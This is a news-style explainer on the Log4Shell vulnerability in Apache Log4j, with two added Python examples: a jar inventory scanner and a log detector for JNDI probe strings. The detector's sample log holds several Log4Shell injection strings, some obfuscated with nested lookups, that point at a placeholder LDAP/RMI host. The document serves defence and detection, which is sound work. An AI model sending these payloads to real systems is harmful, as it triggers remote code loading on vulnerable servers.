Log4Shell is a flaw in Log4j, a logging library maintained by the Apache Software Foundation and written in Java. Log4j is part of the code used by millions of computers running online services.
It is widely used in many applications and is present in many services as a dependency, often indirectly through other components. This includes custom applications developed within organisations and numerous cloud services.
It has been downloaded 84 million times in the last month alone from the largest public repository of open-source Java components.
Alibaba, a Chinese tech company, first reported the flaw last month. It gained widespread public attention after it was shown to be exploitable on servers hosting the Java edition of Minecraft.
Microsoft has said that they have seen hackers using Log4Shell to steal passwords and log-ins, extract data from compromised systems, and install malicious software designed to mine cryptocurrency.
Microsoft is also reporting that some of these hackers are from nation-state hacking groups. They have identified hackers from Turkey, North Korea, China and Iran who are using the flaw for activities ranging from targeted attacks to active “experimentation”.
The Apache Software Foundation, which oversees the Log4j code, has rated the problem a "10", the highest level of severity. And Cloudflare's chief technology officer John Graham-Cumming has called Log4Shell the "third serious flaw to affect a wide range of internet services", after Heartbleed and Shellshock in 2014.
In addition to this, Log4Shell is easy to use, with one security company, Crowdstrike, calling it "trivial" to exploit. This is significant because, when a vulnerability is found in a computer system, defenders usually have a short window in which to fix it before it is widely attacked.
That window exists because cybercriminals first have to work out how to exploit the flaw, and usually only the most skilled and experienced can do so within the first few hours of a vulnerability becoming public. With Log4Shell, a single crafted string that gets logged is enough, so that window has effectively closed.
We do not yet know how many of these attempted attacks are successful, but this incident has the potential to be extremely costly for corporations that become victims. For individuals there is little direct action to take other than to install updates as vendors release them. For businesses the work falls to IT teams: find every copy of Log4j in their estate, including copies bundled inside other products, and update or mitigate each one.
Experts are currently estimating that it will take months or years to find every instance of this vulnerability across enterprises and vendors, because the library is so often buried inside other software.
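The inventory work described above is the part that takes months, because a vulnerable copy of Log4j can sit inside any application's `lib` directory. The following is an added example (not code from the article, Apache or any vendor) of a minimal scanner that walks a directory tree, identifies `log4j-core` jars by the Maven `pom.properties` they carry, and classifies each one as fixed, mitigated (the `JndiLookup` class removed, which was Apache's documented interim mitigation) or vulnerable. The fixed version lines (2.17.0+, 2.12.3+ for Java 7, 2.3.1+ for Java 6) are Apache's published ones; the sample jars built by `demo()` are constructed inline so the script runs offline.

```python
"""Inventory Log4j 2 jars on disk and classify each against the Apache
fixed release lines. Added example, not code from the article."""
import re
import tempfile
import zipfile
from pathlib import Path

# Paths inside a log4j-core jar (stable across the 2.x releases).
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"


def version_tuple(version):
    """'2.14.1' -> (2, 14, 1); missing components are padded with zeros."""
    nums = [int(n) for n in re.findall(r"\d+", version)[:3]]
    return tuple(nums + [0] * (3 - len(nums)))


def is_fixed(version):
    """Fixed release lines per Apache for CVE-2021-44228 and the follow-up
    CVEs: 2.17.0+ (Java 8), 2.12.3+ (Java 7 line), 2.3.1+ (Java 6 line)."""
    v = version_tuple(version)
    return (v >= (2, 17, 0)
            or (2, 12, 3) <= v < (2, 13, 0)
            or (2, 3, 1) <= v < (2, 4, 0))


def classify_jar(path):
    """Return (status, version) for a log4j-core jar, or None for other jars."""
    with zipfile.ZipFile(path) as zf:
        names = set(zf.namelist())
        if POM_PROPS not in names:
            return None
        props = zf.read(POM_PROPS).decode("utf-8", "replace")
        m = re.search(r"^version=(.+)$", props, re.M)
        if not m:
            return None
        version = m.group(1).strip()
        if is_fixed(version):
            return ("fixed", version)
        if JNDI_LOOKUP not in names:
            # Apache's interim mitigation for 2.x: delete JndiLookup.class
            # from the jar so the lookup can never run.
            return ("mitigated", version)
        return ("vulnerable", version)


def scan(root):
    """Walk root and classify every *.jar. Jars nested inside wars or
    fat jars are not opened here; a production scanner must recurse."""
    findings = {}
    for jar in Path(root).rglob("*.jar"):
        try:
            result = classify_jar(jar)
        except zipfile.BadZipFile:
            continue
        if result is not None:
            findings[jar.name] = result
    return findings


def make_sample_jar(path, version, with_jndi_class=True):
    """Build a constructed jar that mimics log4j-core's layout (sample only)."""
    with zipfile.ZipFile(path, "w") as zf:
        zf.writestr(POM_PROPS, "groupId=org.apache.logging.log4j\n"
                    f"artifactId=log4j-core\nversion={version}\n")
        if with_jndi_class:
            zf.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe")  # class magic only


def demo():
    """Constructed sample tree: one vulnerable, one hand-mitigated, one
    fixed and one unrelated jar. Returns {jar name: (status, version)}."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        lib = root / "app" / "lib"
        lib.mkdir(parents=True)
        make_sample_jar(lib / "log4j-core-2.14.1.jar", "2.14.1")
        make_sample_jar(lib / "log4j-core-2.15.0.jar", "2.15.0",
                        with_jndi_class=False)
        make_sample_jar(root / "log4j-core-2.17.1.jar", "2.17.1")
        with zipfile.ZipFile(root / "other.jar", "w") as zf:
            zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        return scan(root)


if __name__ == "__main__":
    for name, (status, version) in sorted(demo().items()):
        print(f"{status:10} {version:8} {name}")
```

Two caveats a practitioner should keep in mind: the scanner reads the version from `pom.properties`, so a repackaged or shaded copy of Log4j without that file is missed, and it does not open jars nested inside `.war` or fat-jar archives, which is where many production copies live.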
Cloudflare, a company that provides internet security and services designed to help online businesses operate smoothly, has implemented measures to protect its users from the vulnerability, telling BBC News it had blocked 1.3 million attempts to use Log4Shell in just one hour on Tuesday.
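Blocking attempts at the edge, as Cloudflare describes, means recognising the exploit string before it reaches a server that logs it. Log4Shell is triggered by Log4j's `${jndi:...}` lookup syntax appearing in logged input, and attackers quickly started hiding it with nested lookups such as `${lower:j}` and the `${x:-default}` form. The following is an added example, not Cloudflare's rules or code from the article, of a detector that first reduces those nested lookups the way Log4j's interpolator would and then matches the resolved string; the log lines and the IP address 198.51.100.7 are constructed sample data.

```python
"""Detect Log4Shell probe strings in log lines, including the common
nested-lookup obfuscations. Added example, not from the article."""
import re

# Innermost ${...} with no further nesting inside it.
INNER = re.compile(r"\$\{([^${}]*)\}")
# What the payload must look like once the nesting is resolved.
JNDI = re.compile(r"\$\{jndi:", re.IGNORECASE)
FROZEN = "\x00{"  # marker for a lookup we leave in place


def normalize(text):
    """Resolve nested lookups from the inside out:
    ${lower:x} / ${upper:x} -> case-mapped x, ${k:-d} -> d,
    anything else is kept literally. Loops until nothing changes."""
    def resolve(match):
        body = match.group(1)
        if body.lower().startswith("jndi:"):
            return FROZEN + body + "}"      # that's the payload: keep it
        if ":-" in body:
            return body.split(":-", 1)[1]   # default-value syntax
        if body[:6].lower() == "lower:":
            return body[6:].lower()
        if body[:6].lower() == "upper:":
            return body[6:].upper()
        return FROZEN + body + "}"          # ${env:..}, ${date:..}, etc.

    previous = None
    while previous != text:
        previous, text = text, INNER.sub(resolve, text)
    return text.replace(FROZEN, "${")


def find_jndi(line):
    """Return the normalized line if it carries a JNDI lookup, else None."""
    resolved = normalize(line)
    return resolved if JNDI.search(resolved) else None


def scan_log(lines):
    """Indices of lines that would trigger the lookup when logged."""
    return [i for i, line in enumerate(lines) if find_jndi(line) is not None]


# Constructed sample access-log lines (user-agent in the last field).
SAMPLE_LOG = [
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.6 - - "GET /login HTTP/1.1" 200 "-" '
    '"${${lower:j}${lower:n}di:ldap://198.51.100.7/a}"',
    '10.0.0.7 - - "GET /x HTTP/1.1" 200 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:rmi://198.51.100.7/a}"',
    '10.0.0.8 - - "GET /health HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '10.0.0.9 - - "GET /docs?q=${env:HOME} HTTP/1.1" 200 "-" "curl/7.79"',
]

if __name__ == "__main__":
    for i in scan_log(SAMPLE_LOG):
        print(f"line {i}: {find_jndi(SAMPLE_LOG[i])}")
```

A plain substring match on `${jndi:` catches only the first sample line; resolving the nesting first is what makes the second and third lines visible, while the `${env:HOME}` line stays a non-match because it resolves to a non-JNDI lookup. The same normalisation can be run over historical logs to find probes that arrived before any filtering was in place.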
Other organisations, like the Cybersecurity and Infrastructure Security Agency (CISA) in the US, are taking further action to protect users. CISA has added Log4Shell to its "Known Exploited Vulnerabilities Catalog", a list of security flaws known to be under active attack that federal agencies are required to remediate.
CISA has also advised all US organisations to follow its guidance on mitigating the flaw, and has set federal civilian agencies a deadline just before Christmas to apply patches or mitigations.